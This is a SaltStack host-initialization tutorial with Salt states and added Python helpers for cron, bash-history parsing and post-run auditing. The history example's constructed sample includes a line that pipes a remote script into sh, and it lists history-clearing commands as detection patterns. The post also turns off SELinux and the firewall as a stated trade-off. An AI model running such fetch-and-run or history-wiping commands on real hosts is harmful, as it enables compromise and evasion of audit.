SaltStack production case: system initialization

      Requirements analysis

      1. System initialization

        1.1  Disable SELinux

        1.2  Disable the default firewall (iptables/firewalld)

        1.3  Time synchronization (configure NTP)

        1.4  File descriptor limits (required: /etc/security/limits.conf)

        1.5  Kernel tuning (required: tcp, memory, io)

        1.6  SSH service tuning (disable DNS lookups, change the port)

        1.7  Trim boot-time services (only sshd stays enabled)

        1.8  DNS resolution (required)

        1.9  Character set

        1.10 Unified hosts file

        1.11 Shell history (record time and user)

        1.12 Terminal idle timeout (security; note that a plain TMOUT can be unset by the user unless the shell also marks it readonly)

        1.13 Configure yum repositories (required)

        1.14 Install the agents (zabbix, logstash)

        1.15 Base users, user auditing, sudo permissions (required)

        1.16 Common base commands and aliases (screen lrzsz tree openssl telnet iftop iotop sysstat wget ntpdate dos2unix lsof net-tools mtr)

        1.17 Login banner, including the PS1 prompt

        1.18 tcp_wrappers configuration

        Items 1.1, 1.2 and 1.18 switch host-level controls off rather than configuring them. That is a common convenience on an internal network, but each is a deliberate trade: with SELinux and firewalld gone, the changed SSH port in 1.6 is the only thing between the host and anything that can reach it, so it should be backed by a network-level filter. Of the items above, 1.9, 1.10, 1.14 and 1.18 have no state file in this post, and 1.15 is covered only by the www user.

         

        cron module: the five fields are minute, hour, day of month, month and day of week. A field you write sets that position; a field you leave out defaults to *.

    cron-ntpdate:
      cron.present:
        - name: ntpdate cn.pool.ntp.org
        - user: root
        - minute: '*/5'
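
An added example, not code from the original post, showing what the cron.present entry above turns into and when it actually fires. It renders the crontab line the way the state writes it (minus Salt's "# Lines below here are managed by Salt" marker), rejects a misspelt argument instead of silently writing *, and steps through the schedule so a field like */5 can be checked before it is pushed to every minion. The day-of-month/day-of-week rule is Vixie cron's, which is what CentOS runs.

```python
"""Render what cron.present writes and compute when it fires.
Unspecified fields default to '*', as the page says; Salt's own
"# Lines below here are managed by Salt" marker is not reproduced."""
from datetime import datetime, timedelta

# (cron.present argument, lowest, highest); dayweek allows 7 = Sunday.
FIELDS = (("minute", 0, 59), ("hour", 0, 23), ("daymonth", 1, 31),
          ("month", 1, 12), ("dayweek", 0, 7))


def expand(expr, lo, hi):
    """Expand one field ('*', '*/5', '1-5', '1,15', '0-23/2') into the set of
    integers it matches; raise ValueError if it is malformed or out of range."""
    values = set()
    for part in str(expr).split(","):
        rng, _, step = part.partition("/")
        step = int(step) if step else 1
        if rng == "*":
            a, b = lo, hi
        elif "-" in rng:
            a, b = (int(x) for x in rng.split("-", 1))
        else:
            a = b = int(rng)
        if step < 1 or not lo <= a <= b <= hi:
            raise ValueError(f"bad cron field {expr!r} for range {lo}-{hi}")
        values.update(range(a, b + 1, step))
    return values


def render_cron(name, **fields):
    """Crontab line for cron.present's name/minute/hour/daymonth/month/dayweek.
    Unknown keywords (a misspelt 'minutes') raise, as the state itself
    errors on an unknown argument instead of silently writing '*'."""
    unknown = sorted(set(fields) - {f for f, _, _ in FIELDS})
    if unknown:
        raise ValueError(f"unknown cron.present argument(s): {unknown}")
    exprs = [str(fields.get(f, "*")) for f, _, _ in FIELDS]
    for (_, lo, hi), expr in zip(FIELDS, exprs):
        expand(expr, lo, hi)  # validate before anything reaches a crontab
    return " ".join(exprs + [name])


def next_runs(line, start, count=3):
    """The next `count` times (strictly after `start`, 'YYYY-MM-DD HH:MM' or a
    datetime) the line fires. Vixie cron rule: a day field starting with '*'
    is unrestricted (even '*/2'); if BOTH day-of-month and day-of-week are
    restricted, a day matches when either does."""
    minute, hour, dom, mon, dow = line.split()[:5]
    minutes, hours = expand(minute, 0, 59), expand(hour, 0, 23)
    doms, months = expand(dom, 1, 31), expand(mon, 1, 12)
    dows = {d % 7 for d in expand(dow, 0, 7)}  # 7 means Sunday, like 0
    if isinstance(start, str):
        start = datetime.fromisoformat(start)
    t = start.replace(second=0, microsecond=0) + timedelta(minutes=1)
    runs = []
    while len(runs) < count:
        cron_dow = (t.weekday() + 1) % 7  # Python Monday=0 -> cron Sunday=0
        dom_ok, dow_ok = t.day in doms, cron_dow in dows
        if dom.startswith("*") and dow.startswith("*"):
            day_ok = True
        elif dom.startswith("*"):
            day_ok = dow_ok
        elif dow.startswith("*"):
            day_ok = dom_ok
        else:
            day_ok = dom_ok or dow_ok
        if day_ok and t.minute in minutes and t.hour in hours and t.month in months:
            runs.append(t.strftime("%Y-%m-%d %H:%M"))
        t += timedelta(minutes=1)
    return runs


if __name__ == "__main__":
    entry = render_cron("ntpdate cn.pool.ntp.org", minute="*/5")
    print(entry)
    print(next_runs(entry, "2024-01-01 00:03"))
```

The Salt arguments map 1:1 onto the five crontab fields; the entry lands in the crontab of the `user` given to the state, which is why `user` is not part of the rendered line.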
    

      

      Directory structure

      The files under init/files that the states below reference:

      epel-7.repo is the downloaded yum repo file

      limits.conf is the tuned limits file

      resolv.conf is the DNS configuration file

      selinux-config is the file that disables SELinux

      sshd_config changes the default port 22 to 8022 and disables DNS lookups (UseDNS no). Because the port changes, keep an existing session open while the state is applied, and make sure anything still filtering traffic (firewalld is off here, but a cloud security group is not) allows 8022 before the reload.

      dns.sls

    /etc/resolv.conf:
      file.managed:
        - source: salt://init/files/resolv.conf
        - user: root
        - group: root
        - mode: 644
    

      firewalld.sls

    firewalld-stop:
      service.dead:
        - name: firewalld.service
        - enable: False
    

      init/history.sls

    history-init:
      file.append:
        - name: /etc/profile
        - text:
          - export HISTTIMEFORMAT="%F %T `whoami` "
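
An added example, not code from the original post, showing what the HISTTIMEFORMAT line above actually leaves on disk. Once the variable is set, bash writes a "#<epoch seconds>" line in front of every command it saves to HISTFILE. The `whoami` in the format string is expanded once, when /etc/profile is sourced, and only ever appears in `history` output; the file itself never records the user, so the owner of the file is the only attribution an investigator gets. The parser below rebuilds the same "%F %T user command" view from a history file and flags the commands that end the record. The sample history is constructed.

```python
"""Read back a bash history file written with HISTTIMEFORMAT set.
Stamps are '#<epoch>' lines in front of each command; the user is not
stored in the file, so the caller supplies it (normally the file's owner)."""
from datetime import datetime, timezone

# Constructed sample of ~/.bash_history: the first command predates the
# setting (no stamp); the last one is the user clearing their own history.
SAMPLE_HISTORY = """\
ls -la
#1712000000
sudo -l
#1712000005
curl -fsSL http://example.invalid/x.sh | sh
#1712000062
history -c
"""

# Commands that remove or disable exactly the record this page relies on.
ANTI_HISTORY = ("history -c", "unset HISTFILE", "HISTFILE=/dev/null",
                "HISTSIZE=0", ".bash_history")


def parse_history(text, user):
    """Return [(timestamp or None, user, command), ...], timestamps as
    'YYYY-MM-DD HH:MM:SS' in UTC. Commands saved before the setting was
    enabled carry None rather than being dropped. A '#' followed only by
    digits is a stamp; any other '#...' line is a comment the user typed
    and is kept as a command."""
    entries, pending = [], None
    for line in text.splitlines():
        if line.startswith("#") and line[1:].isdigit():
            stamp = datetime.fromtimestamp(int(line[1:]), timezone.utc)
            pending = stamp.strftime("%Y-%m-%d %H:%M:%S")
            continue
        entries.append((pending, user, line))
        pending = None
    return entries


def render(entries):
    """Render as `history` would with HISTTIMEFORMAT="%F %T <user> "."""
    return [f"{ts or '-' * 19} {user} {cmd}" for ts, user, cmd in entries]


def anti_history_commands(entries):
    """Entries that clear or disable history, i.e. where the record ends."""
    return [e for e in entries if any(p in e[2] for p in ANTI_HISTORY)]


if __name__ == "__main__":
    rows = parse_history(SAMPLE_HISTORY, user="www")
    print("\n".join(render(rows)))
    for ts, _, cmd in anti_history_commands(rows):
        print(f"history ends at {ts}: {cmd}")
```

Because the file is owned and writable by the same user whose actions it records, this setting is a convenience for operators, not an audit trail; 1.15 in the requirements (user auditing) needs a record the user cannot edit, such as auditd or a forwarded log, to be meaningful.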
    

      init/limmit.sls 

    limits-config:
      file.managed:
        - name: /etc/security/limits.conf
        - source: salt://init/files/limits.conf
        - user: root
        - group: root
        - mode: 644
    

      init/ntp-client.sls 

    install-ntpdate:
      pkg.installed:
        - name: ntpdate
    
    cron-ntpdate:
      cron.present:
        - name: ntpdate cn.pool.ntp.org
        - user: root
        - minute: '*/5'
    

      init/pkg-base.sls

    include:
      - init.yum-repo
    
    base-install:
      pkg.installed:
        - pkgs:
          - screen
          - lrzsz
          - tree
          - openssl
          - telnet
          - iftop
          - iotop
          - sysstat
          - wget
          - dos2unix
          - lsof
          - net-tools
          - mtr
          - unzip
          - zip
          - vim-enhanced
          - bind-utils
        - require:
          - file: /etc/yum.repos.d/epel-7.repo
    

      init/selinux.sls

    close_selinux:
      file.managed:
        - name: /etc/selinux/config
        - source: salt://init/files/selinux-config
        - user: root
        - group: root
        - mode: 644
      cmd.run:
        # Take effect now without a reboot. setenforce exits non-zero when
        # SELinux is already disabled at boot, hence the fallback; the unless
        # clause skips the command once the host is no longer Enforcing, so
        # the state stops reporting a change on every run.
        - name: setenforce 0 || true
        - unless: test "$(getenforce)" != Enforcing
    

      init/ssh.sls

    sshd-config:
      file.managed:
        - name: /etc/ssh/sshd_config
        - source: salt://init/files/sshd_config
        - user: root
        - group: root
        - mode: 600
        # Syntax-check the new file before it replaces the live one; on a
        # non-zero exit Salt leaves the old sshd_config in place, which is
        # the difference between a failed state and a lost SSH session.
        - check_cmd: /usr/sbin/sshd -t -f
      service.running:
        - name: sshd
        - enable: True
        - reload: True
        - watch:
          - file: sshd-config
    

      init/sysctl.sls

    # Both keys tune TCP connection teardown; keep comments here so the next
    # person knows why these values were chosen.
    net.ipv4.tcp_fin_timeout:
      sysctl.present:
        # Seconds an orphaned socket stays in FIN-WAIT-2. 2 is aggressive
        # (kernel default 60) and suits a busy front end that closes first.
        - value: 2

    net.ipv4.tcp_tw_reuse:
      sysctl.present:
        # Lets the kernel reuse TIME-WAIT sockets for new OUTGOING connections
        # (the only direction this key affects); needs TCP timestamps on.
        - value: 1
    

      init/thin.sls 

    postfix:
      service.dead:
        - enable: False
    

      init/tty-style.sls

    /etc/bashrc:
      file.append:
        - text:
          - export PS1='[\u@\h \w]\$ '
    

      init/tty-timeout.sls

    tty-timeout:
      file.append:
        - name: /etc/profile
        - text:
          - export TMOUT=300
    

      init/user-www.sls

    www-user-group:
      group.present:
        - name: www
        - gid: 1000
      user.present:
        - name: www
        - fullname: www
        # /sbin/bash does not exist on CentOS; the account would be created
        # but could not log in. Use /sbin/nologin instead if www only needs
        # to own files and run services. uid/gid 1000 is also what the first
        # interactive user gets on CentOS 7, so pick a value that cannot clash.
        - shell: /bin/bash
        - uid: 1000
        - gid: 1000
        - require:
          - group: www-user-group
    

      init/yum-repo.sls 

    /etc/yum.repos.d/epel-7.repo:
      file.managed:
        - source: salt://init/files/epel-7.repo
        - user: root
        - group: root
        - mode: 644
    

      init-all.sls

    include:
      - init.dns
      - init.yum-repo
      - init.firewalld
      - init.history
      - init.limmit
      - init.ntp-client
      - init.pkg-base
      - init.selinux
      - init.ssh
      - init.sysctl
      - init.thin
      - init.tty-timeout
      - init.tty-style
      - init.user-www
    

      Run it against a minion to initialize the host (add test=True to the same command for a dry run first; once applied, SSH is on port 8022):

    salt 'linux-node2.example.com' state.sls init-all
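
An added example, not code from the original post, that checks the result of the run against the requirements list: it re-reads the files the states manage and reports which items hold. Paths are resolved under a root directory, so it runs against "/" on the minion, a mounted image, or a scratch directory; demo() builds two constructed scratch roots (sample data, not from a real host), one at the target state and one that has drifted. The sshd_config parser keeps every occurrence of a directive because sshd honours the first one and a second Port line adds a listener rather than replacing the first, which is exactly the drift a grep for "Port 8022" would miss.

```python
"""Post-run audit for the init-all target state of this page.
Paths resolve under `root`: "/" on the minion, a mounted image, or a
scratch directory of constructed files (demo() builds two of those)."""
import os
import re
import tempfile


def _read(root, path):
    """Text of root+path, or "" when the file is missing."""
    try:
        with open(os.path.join(root, path.lstrip("/")), encoding="utf-8",
                  errors="replace") as fh:
            return fh.read()
    except FileNotFoundError:
        return ""


def sshd_directives(text):
    """Lower-cased directive -> values in file order (sshd uses the FIRST;
    a second 'Port' adds a listener). Stops at the first Match block."""
    conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.lower().startswith("match"):
            break
        parts = re.split(r"\s+|\s*=\s*", line, maxsplit=1)
        if len(parts) == 2:
            conf.setdefault(parts[0].lower(), []).append(parts[1].strip())
    return conf


def kv_assignments(text):
    """KEY=value lines of /etc/selinux/config or /etc/profile; an 'export'
    prefix, '#' comments and surrounding quotes are removed."""
    out = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line.startswith("export "):
            line = line[len("export "):]
        m = re.match(r"([A-Za-z_][A-Za-z0-9_]*)=(.*)", line)
        if m:
            out[m.group(1)] = m.group(2).strip().strip("\"'")
    return out


def audit_init(root="/"):
    """{requirement: passed}. firewalld is judged by its systemd enablement
    symlink; sysctl values come from /proc/sys (the running kernel)."""
    sshd = sshd_directives(_read(root, "/etc/ssh/sshd_config"))
    profile = kv_assignments(_read(root, "/etc/profile"))
    selinux = kv_assignments(_read(root, "/etc/selinux/config"))
    limits = _read(root, "/etc/security/limits.conf")
    cron = _read(root, "/var/spool/cron/root")
    sysctl = lambda key: _read(root, "/proc/sys/" + key.replace(".", "/")).strip()
    fw_link = os.path.join(root, "etc/systemd/system/multi-user.target.wants/firewalld.service")
    return {
        "1.1 SELINUX=disabled": selinux.get("SELINUX") == "disabled",
        "1.2 firewalld not enabled": not os.path.lexists(fw_link),
        "1.3 ntpdate cron every 5 min": bool(re.search(r"^\*/5 \* \* \* \* ntpdate ", cron, re.M)),
        "1.4 nofile limit present": bool(re.search(r"^\s*[^#\s]\S*\s+(soft|hard|-)\s+nofile\s+\d+", limits, re.M)),
        "1.5 tcp_fin_timeout=2": sysctl("net.ipv4.tcp_fin_timeout") == "2",
        "1.5 tcp_tw_reuse=1": sysctl("net.ipv4.tcp_tw_reuse") == "1",
        "1.6 sshd listens only on 8022": sshd.get("port") == ["8022"],
        "1.6 sshd UseDNS no": sshd.get("usedns", [""])[0].lower() == "no",
        "1.11 HISTTIMEFORMAT set": "HISTTIMEFORMAT" in profile,
        "1.12 TMOUT=300": profile.get("TMOUT") == "300",
    }


def demo():
    """Audit two constructed scratch roots: one at the target state, one that
    drifted (stray 'Port 22' ahead of 'Port 8022', TMOUT gone, firewalld on)."""
    target = {
        "/etc/selinux/config": "# SELinux config\nSELINUX=disabled\nSELINUXTYPE=targeted\n",
        "/etc/ssh/sshd_config": "Port 8022\nUseDNS no\nPermitRootLogin yes\n",
        "/etc/profile": 'export HISTTIMEFORMAT="%F %T `whoami` "\nexport TMOUT=300\n',
        "/var/spool/cron/root": "# Lines below here are managed by Salt, do not edit\n*/5 * * * * ntpdate cn.pool.ntp.org\n",
        "/etc/security/limits.conf": "* soft nofile 65535\n* hard nofile 65535\n",
        "/proc/sys/net/ipv4/tcp_fin_timeout": "2\n",
        "/proc/sys/net/ipv4/tcp_tw_reuse": "1\n",
    }
    drifted = dict(target)
    drifted["/etc/ssh/sshd_config"] = "Port 22\nPort 8022\nUseDNS no\n"
    drifted["/etc/profile"] = 'export HISTTIMEFORMAT="%F %T `whoami` "\n'
    drifted["/etc/systemd/system/multi-user.target.wants/firewalld.service"] = ""
    results = []
    for files in (target, drifted):
        root = tempfile.mkdtemp(prefix="init-audit-")
        for path, text in files.items():
            full = os.path.join(root, path.lstrip("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(text)
        results.append(audit_init(root))
    return results
```

Run it on the minion as root after the state (for example via `salt-cp` plus `cmd.run`, or as a custom execution module), or point `audit_init` at an unpacked image. Items without a file-level artefact on this page (1.7, 1.9, 1.10, 1.14) are not checked.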
    

      

      

      

Original post: https://www.cnblogs.com/minseo/p/8849352.html